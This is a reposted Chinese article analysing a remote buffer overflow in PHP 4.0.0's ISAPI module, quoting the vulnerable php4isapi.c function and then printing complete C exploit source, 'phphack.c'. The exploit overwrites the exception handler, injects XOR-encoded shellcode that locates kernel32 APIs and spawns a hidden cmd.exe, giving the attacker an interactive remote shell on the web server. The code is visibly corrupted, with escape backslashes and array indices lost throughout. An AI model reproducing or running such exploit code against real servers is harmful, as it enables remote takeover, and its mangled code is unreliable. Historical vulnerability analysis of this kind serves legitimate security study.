php4.0.0远程溢出源代码分析与测试程序

2020-03-22 16:24:44

字体：大中小

来源：转载

供稿：网友

php4.0.0才出来的时候，我们测试发现php4isasp.dll有缓冲溢出漏洞，下面是php4isapi.c的相关源代码：

html' target='_blank'>static void sapi_isapi_register_server_variables(zval *track_vars_array ELS_DC SLS_DC PLS_DC)
{
char static_variable_buf[ISAPI_SERVER_VAR_BUF_SIZE];
char *variable_buf;
DWORD variable_len = ISAPI_SERVER_VAR_BUF_SIZE;
char *variable;
char *strtok_buf = NULL;
LPEXTENSION_CONTROL_BLOCK lpECB;
char **p = isapi_server_variables;

lpECB = (LPEXTENSION_CONTROL_BLOCK) SG(server_context);

/* Register the standard ISAPI variables */
while (*p) {
variable_len = ISAPI_SERVER_VAR_BUF_SIZE;
if (lpECB->GetServerVariable(lpECB->ConnID, *p, static_variable_buf, &variable_len)
&& static_variable_buf[0]) {
php_register_variable(*p, static_variable_buf, track_vars_array ELS_CC PLS_CC);
} else if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
variable_buf = (char *) emalloc(variable_len);
if (lpECB->GetServerVariable(lpECB->ConnID, *p, variable_buf, &variable_len)
&& variable_buf[0]) {
php_register_variable(*p, variable_buf, track_vars_array ELS_CC PLS_CC);
}
efree(variable_buf);
}
p++;
}

/* PHP_SELF support */
#ifdef WITH_ZEUS
if (lpECB->GetServerVariable(lpECB->ConnID, "PATH_INFO", static_variable_buf, &variable_len)
#else
if (lpECB->GetServerVariable(lpECB->ConnID, "SCRIPT_NAME", static_variable_buf, &variable_len)

/* php4.0.0漏洞所在地，缓冲溢出。此时的variable_len变量已经是上次调用GetServerVariable 的返回变量 */
/* php4.0.3 已经修补 */

#endif
&& static_variable_buf[0]) {
php_register_variable("PHP_SELF", static_variable_buf, track_vars_array ELS_CC PLS_CC);

/*
因为形参被覆盖，而这形参又很难伪造，所以传统的溢出攻击因为这个调用不能返回而无效
但我们可以使用异常结构攻击，可以参见我的相关的文章
*/

}

/* Register the internal bits of ALL_HTTP */

variable_len = ISAPI_SERVER_VAR_BUF_SIZE;

if (lpECB->GetServerVariable(lpECB->ConnID, "ALL_HTTP", static_variable_buf, &variable_len)) {
variable_buf = static_variable_buf;
} else {
if (GetLastError()==ERROR_INSUFFICIENT_BUFFER) {
variable_buf = (char *) emalloc(variable_len);
if (!lpECB->GetServerVariable(lpECB->ConnID, "ALL_HTTP", variable_buf, &variable_len)) {
efree(variable_buf);
return;
}
} else {
return;
}
}
variable = php_strtok_r(variable_buf, "", &strtok_buf);
while (variable) {
char *colon = strchr(variable, ':');

if (colon) {
char *value = colon+1;

while (*value==' ') {
value++;
}
*colon = 0;
php_register_variable(variable, value, track_vars_array ELS_CC PLS_CC);
*colon = ':';
}
variable = php_strtok_r(NULL, "", &strtok_buf);
}
if (variable_buf!=static_variable_buf) {
efree(variable_buf);
}
}

因为形参的问题，采用的覆盖异常处理结构的办法使得shellcode代码得到控制。但因为异常结构代码相对不统一，可能需要根据被攻击系统的WINDOWS版本调整相关参数。具体攻击测试代码：

/*
php4.0 overflow program phphack.c ver 1.0
copy by yuange <yuange@163.net> 2000。08。16

*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
// #define DEBUG

//#define RETEIPADDR eipwin2000
#define FNENDLONG 0x08
#define NOPCODE 'B' // INC EDX 0x90
#define NOPLONG 0x3c
#define BUFFSIZE 0x20000

#define RETEIPADDRESS 0x900+4
#define SHELLBUFFSIZE 0x800
#define SHELLFNNUMS 9
#define DATAXORCODE 0xAA
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139

#define SHELLPORT 0x1f90 //0x1f90=8080
#define WEBPORT 80

void shellcodefnlock();
void shellcodefn(char *ecb);

void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);

int main(int argc, char **argv)
{
char *server;
char *str="LoadLibraryA""x0""CreatePipe""x0"
"CreateProcessA""x0""CloseHandle""x0"
"PeekNamedPipe""x0"
"ReadFile""x0""WriteFile""x0"
"Sleep""x0"
"cmd.exe""x0""x0dx0a""exit""x0dx0a""x0"
"XORDATA""x0"
"strend";
char buff1[]="GET /default.php4";
char buff2[]=" HTTP/1.1 HOST:";
char *fnendstr="x90x90x90x90x90x90x90x90x90";
char SRLF[]="x0dx0ax00x00";

char eipjmpesp[] ="xb7x0exfax7f";
// push esp
// ret
char eipexcept[]="xb8x0exfax7F";
// ret
char eipjmpesi[]="x08x88xfax7F";
char eipjmpedi[]="xbex8bxfax7F";
char eipjmpebx[]="x73x67xfax7F";
// push ebx
// ret
/*
jmp ebx功能代码地址，中文WINNT、中文WIN2000此地址固定
这是处于c_936.nls模块
win2000发生异常调用异常处理结构代码时ebx指向异常结构。winnt老版本是esi,可用7ffa8808,后面版本是edi,可用7ffa8bbe。
*/

char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[0x1000];
struct sockaddr_in s_in2,s_in3;
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong;
// unsigned
int i,j,k;
unsigned char temp;
int fd;
u_short port,port1,shellcodeport;
SOCKET d_ip;
WSADATA wsaData;
int offset=0;
int xordatabegin;
int lockintvar1,lockintvar2;
char lockcharvar;
int OVERADD=RETEIPADDRESS;
int result;

fprintf(stderr," PHP4.0 FOR WIN32 OVERFLOW PROGRAM 2.0 .");
fprintf(stderr," copy by yuange 2000.8.16.");
fprintf(stderr," wellcome to my homepage http://yuange.yeah.net .");
fprintf(stderr," welcome to http://www.nsfocus.com .");
fprintf(stderr," usage: %s <server> [webport] ", argv[0]);

if(argc <2){
fprintf(stderr," please enter the web server:");
gets(recvbuff);
for(i=0;i<strlen(recvbuff);++i){
/t if(recvbuff!=' ') break;
}

server=recvbuff;
if(i<strlen(recvbuff)) server+=i;
/*
fprintf(stderr," please enter the offset(0-3):");
gets(buff);
for(i=0;i<strlen(buff);++i){
/t if(buff!=' ') break;
}
offset=atoi(buff+i);
*/
}

result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
/tfprintf(stderr, "Your computer was not connected "
/t "to the Internet at the time that "
/t "this program was launched, or you "
/t "do not have a 32-bit "
/t "connection to the Internet.");
/texit(1);
}

/*
if(argc>2){
offset=atoi(argv[2]);
}
OVERADD+=offset;
if(offset<0||offset>3){
fprintf(stderr," offset error !offset 0 - 3 .");
gets(buff);
exit(1);
}

*/

if(argc <2){
// WSACleanup( );
// exit(1);
}
else server = argv[1];

for(i=0;i<strlen(server);++i){
if(server!=' ')
break;
}
if(i<strlen(server)) server+=i;

for(i=0;i+3<strlen(server);++i){

if(server==':'){
/t if(server[i+1]=='/'||server[i+1]=='/'){
/t if(server[i+2]=='/'||server[i+2]=='/'){
/t/t server+=i;
/t/t server+=3;
/t/t break;
/t }
/t }
}
}
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='/'||server[i-1]=='/') server[i-1]=0;
}

d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf(" Can't get the ip of %s !",server);
gets(buff);
exit(1);
}
else memcpy(&d_ip, he->h_addr, 4);
}

if(argc>2) port=atoi(argv[2]);
else port=WEBPORT;
if(port==0) port=WEBPORT;

fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
/t
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf(" nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));

if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)
{/t
closesocket(fd);
WSACleanup( );
fprintf(stderr," connect err.");
gets(buff);
exit(1);
}

_asm{
/t mov ESI,ESP
/t cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
/t ++chkespadd;
/t i=*(int*)chkespadd;
/t chkespadd+=i;
/t chkespadd+=4;
}

shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
/t ++shellcodefnadd;
/t k=*(int *)shellcodefnadd;
/t shellcodefnadd+=k;
/t shellcodefnadd+=4;
}

for(k=0;k<=0x500;++k){
/t if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memset(buff,NOPCODE,BUFFSIZE);
if(argc>4){
memcpy(buff,argv[4],strlen(argv[4]));
}
else memcpy(buff,buff1,strlen(buff1));
// strcpy(buff,buff1);
// memset(buff+strlen(buff),NOPCODE,1);

memcpy(buff+OVERADD+0x60+NOPLONG,shellcodefnadd+k+4,0x80);
// memcpy(buff+NOPLONG,shellcodefnadd+k+4,0x80);

shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
/t ++shellcodefnadd;
/t k=*(int *)shellcodefnadd;
/t shellcodefnadd+=k;
/t shellcodefnadd+=4;
}

for(k=0;k<=0x1000;++k){
/t if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}

memcpy(shellcodebuff,shellcodefnadd,k); //j);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);

sendpacketlong=k+i;
for(k=0;k<=0x200;++k){
/t if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;

///t if(memcmp(buff+NOPLONG+k,fnendstr,FNENDLONG)==0) break;

}

for(i=0;i<sendpacketlong;++i){
/t temp=shellcodebuff;
/t temp^=DATAXORCODE;
/t if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='/'||temp=='0'||temp=='?'||temp=='%'){
/t buff[OVERADD+NOPLONG+k]='0';

// buff[NOPLONG+k]='0';
/t ++k;
/t temp+=0x40;
/t }
/t buff[OVERADD+NOPLONG+k]=temp;

// buff[NOPLONG+k]=temp;
/t ++k;
}

// memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
// k+=sendpacketlong;

/*
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+OVERADD+i,eipexcept,4);
}
memcpy(buff+OVERADD+i,eipjmpesp,4);
*/
for(i=-40;i<0x40;i+=8){
memcpy(buff+OVERADD+i,"x42x42x42x2D",4);
memcpy(buff+OVERADD+i+4,eipjmpebx,4);
}
memcpy(buff+OVERADD+i+8,"x42x42x42x42x61x61x61x61x61x61x61x61x61x61x61x61x5bxffx63x64x42x42x42x42",24);

// fprintf(stderr," offset:%d",offset);

/*

192.168.8.48
if(argc>2){
server=argv[2];
if(strcmp(server,"win9x")==0){
/t memcpy(buff+OVERADD,eipwin9x,4);
/t fprintf(stderr," nuke win9x.");
}
if(strcmp(server,"winnt")==0){
/t memcpy(buff+OVERADD,eipwinnt,4);
/t fprintf(stderr," nuke winnt.");
}

}

*/

sendpacketlong=k+OVERADD+i+NOPLONG;
//sendpacketlong=k+NOPLONG;

strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);

sendpacketlong=strlen(buff);
// buff[sendpacketlong]=0x90;
strcpy(buff+sendpacketlong,"");
/*
buff[sendpacketlong]=0x90;
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+sendpacketlong+OVERADD+i,eipexcept,4);
}
memcpy(buff+sendpacketlong+OVERADD+i,eipwinnt,4);

strcpy(buff+sendpacketlong+OVERADD+i+4,"xffx63x64");

strcpy(buff+sendpacketlong+OVERADD+i+20,"");
*/

// printf(" send buff:%s",buff);
// strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);

/*
#ifdef DEBUG
_asm{
lea esp,buff
/tadd esp,OVERADD
ret

}
#endif

*/
if(argc>6) {
if(strcmp(argv[6],"debug")==0) {
/t _asm{
/t lea esp,buff
/t add esp,OVERADD
/t ret
/t }
}
}

xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr," send packet %d bytes.",j);
// fprintf(stderr," sned:%s ",buff);
send(fd,buff,j,0);
k=recv(fd,recvbuff,0x1000,0);
if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
/t xordatabegin=1;
/t k=-1;
/t fprintf(stderr," ok!");
}
if(k>0){
/t recvbuff[k]=0;
/t fprintf(stderr," recv: %s",recvbuff);
}

}

k=1;
ioctlsocket(fd, FIONBIO, &k);

// fprintf(stderr," now begin: ");

lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;

/*
for(i=0;i<strlen(SRLF);++i){
/t SRLF^=DATAXORCODE;
}
send(fd,SRLF,strlen(SRLF),0);
send(fd,SRLF,strlen(SRLF),0);
send(fd,SRLF,strlen(SRLF),0);
*/
k=1;
while(k!=0){
if(k<0){
/t gets(buff);
/t k=strlen(buff);
/t memcpy(buff+k,SRLF,3);
// send(fd,SRLF,strlen(SRLF),0);
// fprintf(stderr,"%s",buff);
/t for(i=0;i<k+2;++i){
/t/tlockintvar2=lockintvar2*0x100;
/t/tlockintvar2=lockintvar2%LOCKBIGNUM;
/t/tlockcharvar=lockintvar2%0x100;
/t/tbuff^=lockcharvar; // DATAXORCODE;
///t buff^=DATAXORCODE;
/t }
/t send(fd,buff,k+2,0);
///t send(fd,SRLF,strlen(SRLF),0);
}
k=recv(fd,buff,0x1000,0);
if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0) {
/t xordatabegin=1;
/t k=-1;
}

if(k>0){
///t fprintf(stderr,"recv %d bytes",k);
/t if(xordatabegin==1){
/t for(i=0;i<k;++i){
/t/tlockintvar1=lockintvar1*0x100;
/t/tlockintvar1=lockintvar1%LOCKBIGNUM;
/t/tlockcharvar=lockintvar1%0x100;
/t/tbuff^=lockcharvar; // DATAXORCODE;
/t }
/t }
/t buff[k]=0;
/t fprintf(stderr,"%s",buff);
}
// if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr," the server close connect.");
gets(buff);
return(0);
}
void shellcodefnlock()
{
_asm{
/t nop
/t nop
/t nop
/t nop
/t nop
/t nop
/t nop
/t nop
/t _emit('.')

/t _emit('p')
/t _emit('h')
/t _emit('p')
/t _emit('4')
/t _emit('?')

/t jmp next
getediadd: pop EDI
/t push EDI
/t pop ESI
/t push ebx // ecb
/t push ebx/t // call shellcodefn ret address
/t xor ecx,ecx
looplock: lodsb
/t cmp al,cl
/t jz shell
/t cmp al,0x30
/t jz clean0
sto:/t xor al,DATAXORCODE
/t stosb
/t jmp looplock
clean0: lodsb
/t sub al,0x40
/t jmp sto
next:/t call getediadd
shell:/t NOP
/t NOP
/t NOP
/t NOP
/t NOP
/t NOP
/t NOP
/t NOP
/t
}
}/t

void shellcodefn(char *ecb)
{ char/tBuff[SHELLBUFFSIZE+2];
int/t *except[2];

FARPROC Sleepadd;
FARPROC WriteFileadd;
FARPROC ReadFileadd;
FARPROC PeekNamedPipeadd;
FARPROC CloseHandleadd;
FARPROC CreateProcessadd;
FARPROC CreatePipeadd;
FARPROC/tprocloadlib;

FARPROC apifnadd[1];
FARPROC procgetadd=0;
FARPROC writeclient= *(int *)(ecb+0x84);
FARPROC readclient = *(int *)(ecb+0x88);
HCONN ConnID = *(int *)(ecb+8) ;
char/t*stradd;
int/t imgbase,fnbase,k,l;
HANDLE libhandle; //libwsock32;
STARTUPINFO siinfo;

PROCESS_INFORMATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int/t lBytesRead;
int lockintvar1,lockintvar2;
char lockcharvar;

SECURITY_ATTRIBUTES sa;
_asm {/t jmp nextcall
/t getstradd: pop stradd
/t/t lea EDI,except
/t/t mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;

imgbase=0x77e00000;
_asm{
/t call getexceptretadd
}
for(;imgbase<0xbffa0000,procgetadd==0;){
/t imgbase+=0x10000;
/t if(imgbase==0x78000000) imgbase=0xbff00000;
/t if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
/t/t fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
/t/t k=*(int *)(fnbase+0xc)+imgbase;
/t/t if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
/t/t libhandle=imgbase;
/t/t k=imgbase+*(int *)(fnbase+0x20);
/t/t for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
/t/t/tif(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor')
/t/t/t{
/t/t/t k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
/t/t/t k+=*(int *)(fnbase+0x10)-1;
/t/t/t k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
/t/t/t procgetadd=k+imgbase;
/t/t/t break;
/t/t/t}
/t/t }
/t/t }
/t }
/t }
//搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址
//注意这儿处理了搜索页面不在情况。

/tif(procgetadd==0) goto die ;

/t for(k=1;k<SHELLFNNUMS;++k) {
/t/tapifnadd[k]=procgetadd(libhandle,stradd);
/t/tfor(;;++stradd){
/t/t if(*(stradd)==0&&*(stradd+1)!=0) break;
/t/t}
/t/t++stradd;
/t }

/t sa.nLength=12;
/t sa.lpSecurityDescriptor=0;
/t sa.bInheritHandle=TRUE;

/t CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
/t CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);

// ZeroMemory(&siinfo,sizeof(siinfo));
/t _asm{
/t/t lea EDI,siinfo
/t/txor eax,eax
/t/tmov ecx,0x11
/t/trepnz stosd
/t }
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
k=0;
// while(k==0)
// {
/tk=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
/tstradd+=8;
// }
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
k=8;
writeclient(ConnID,stradd+9,&k,0);

lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;

while(1) {
/tPeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
/tif(lBytesRead>0) {
/t ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
/t if(lBytesRead>0) {
/t for(k=0;k<lBytesRead;++k){
/t/tlockintvar2=lockintvar2*0x100;
/t/tlockintvar2=lockintvar2%LOCKBIGNUM;
/t/tlockcharvar=lockintvar2%0x100;
/t/tBuff[k]^=lockcharvar; // DATAXORCODE;
///t/tBuff[k]^=DATAXORCODE;
/t }
/t writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
/t }
/t}
/telse{
/t lBytesRead=SHELLBUFFSIZE;
/t k=readclient(ConnID,Buff,&lBytesRead);
/t if(k!=1){
/t/tk=8;
/t/tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
/t/tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
/t/tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
/t/twhile(1){
/t/t Sleepadd(0x7fffffff);/t/t //僵死
/t/t}
/t
/t }
/t else{
/t/tfor(k=0;k<lBytesRead;++k){
/t/t lockintvar1=lockintvar1*0x100;
/t/t lockintvar1=lockintvar1%LOCKBIGNUM;
/t/t lockcharvar=lockintvar1%0x100;
/t/t Buff[k]^=lockcharvar; // DATAXORCODE;
///t/t Buff[k]^=DATAXORCODE;
/t/t}
/t/tWriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
///t Sleepadd(1000);
/t }
/t}
}

die: goto die ;
/t_asm{

getexceptretadd: pop eax
/t/t push eax
/t/t mov edi,dword ptr [stradd]
/t/t mov dword ptr [edi-0x0e],eax
/t/t ret
errprogram:/t mov eax,dword ptr [esp+0x0c]
/t/t add eax,0xb8
/t/t mov dword ptr [eax],0x11223344 //stradd-0xe
/t/t xor eax,eax/t/t//2
/t/t ret/t/t/t//1
execptprogram: jmp errprogram/t //2 bytes stradd-7
nextcall:/t call getstradd/t //5 bytes
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t/t NOP
/t}/t
}

void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;

for(i=0;i<len;++i){
temp=shellbuff;
if(temp==0xe8){
/t k=*(int *)(shellbuff+i+1);
/t calladd=fnadd;
/t calladd+=k;
/t calladd+=i;
/t calladd+=5;
/t if(calladd==chkesp){
/t shellbuff=0x90;
/t shellbuff[i+1]=0x43; // inc ebx
/t shellbuff[i+2]=0x4b; // dec ebx
/t shellbuff[i+3]=0x43;
/t shellbuff[i+4]=0x4b;
/t }
}
}
}

郑重声明：本文版权归原作者所有，转载文章仅为传播更多信息之目的，如作者信息标记有误，请第一时间联系我们修改或删除，多谢。

上一篇：php mssql 分页SQL语句优化持续影响

下一篇：php实现动态随机验证码机制（CAPTCHA）

发表评论 共有条评论

用户名: 密码:

验证码: 匿名发表

学习交流

更多

MBR怎么转换为GPT？硬盘MBR格式

威刚发布新一代Ultimate SU900

MBR怎么转换为GPT？硬盘MBR格式转换成GPT格
MBR怎么转换为GPT？硬盘MBR格式转换成GPT格式教程...

快剪辑自带水印可以消除，只需简单设置12-24

飞鸽传书好友列表显示异常？或许是这两个原因12-24

下载网页中视频的方法~~12-24

教你用拼音打出来不认识的字~~12-24

Nginx服务器上安装并配置PHPMyAdmin的教程03-22

Mac配置虚拟主机详细过程03-22

关于集群、分布式和负载均衡的区别有哪些？（03-22

phpMyAdmin4.4.10安装03-22

phpmyadmin导入数据最大限制2048KB的解决方03-22

热门图片

更多

校园甜美的背影，洋溢着青春烂漫的回忆

芭蕾舞蹈表演，真实美到极致

春天的魅力：绿杨烟外晓寒轻

春节临近，各地春节彩灯高高挂

肉食主义者的最爱美食烤肉图片

夏日甜心草莓美食图片

人逢知己千杯少，喝酒搞笑图集

搞笑试卷，学生恶搞答题

猜你喜欢的新闻

美团云5月31日起停止对用户服务

中国移动2019年净利润1066亿元超出预期

国内油价重回“5元时代” 92号汽油每升下调

腾讯在天津成立新公司斥资2亿元人民币

软银集团或放弃收购WeWork 30亿美元收购要

全球十大IC设计公司最新排名

光刻机霸主阿斯麦(ASML)：控制芯片产业链上游

博通状告Netflix侵犯专利：电视没人看，我们受

比尔·盖茨退出公司董事会将继续担任公司

微软被曝高危漏洞“永恒之黑” 或波及全球1

猜你喜欢的关注

php的static变量的介绍

PHP中的魔术常量是什么

PHP数组排序函数合集以及它们之间的联系分

php实现仿写CodeIgniter的购物车类

php.ini 配置文件的深入解析

PHP怎样用正则抓取页面中的网址

Zend Framework教程之Zend_Config_Xml用法

3个PHP多维数组转为一维数组的方法实例

PHP把网页保存为word文件的三种方法

对于PHP的Yii框架中的Controller控制器的解

新闻热点

美团云5月31日起停止对用户服务

2020-03-22 13:00:36

中国移动2019年净利润1066亿元超出预期

2020-03-19 18:53:05

国内油价重回“5元时代” 92号汽油每升下调0.80元

2020-03-18 19:35:57

腾讯在天津成立新公司斥资2亿元人民币

2020-03-18 19:32:46

软银集团或放弃收购WeWork 30亿美元收购要约计划告吹

2020-03-18 19:30:20

全球十大IC设计公司最新排名

2020-03-18 13:04:38

疑难解答

MBR怎么转换为GPT？硬盘MBR格式转换成GPT格式

SSD干货固态硬盘选购指南

威刚发布新一代Ultimate SU900固态硬盘:罕

三星发布容量达32TB的新硬盘能效更高

美光Crucial MX300 SSD新增三款型号:奇怪的

电脑硬盘蓝盘黑盘红盘绿盘选择推荐

GPT分区格式怎么转成MBR 硬盘GPT和MBR分区

电脑更新后系统不识别移动硬盘的原因分析及

威刚推出入门级XPG SX7000系列M.2 SSD

2TGB大容量金士顿DataTraveler Ultimate GT

图片精选

自己搭建一个 Laravel 的 Docker的

yii2权限控制rbac之rule详细讲解

php如何实现上篇和下篇的功能（代码）

PHP下扩展memcache模块

网友关注

PPT超强插件打包分享，从此不再被同事吐槽

快剪辑自带水印可以消除，只需简单设置

飞鸽传书好友列表显示异常？或许是这两个原因

下载网页中视频的方法~~

教你用拼音打出来不认识的字~~

武林网教你设置电脑开机声音教程

教你如何检查主板USB功能是否激活

启动桌面清理向导的方法教程

电脑下载东西经常掉线的解决方法

修改BIOS 避免误触Power键造成关机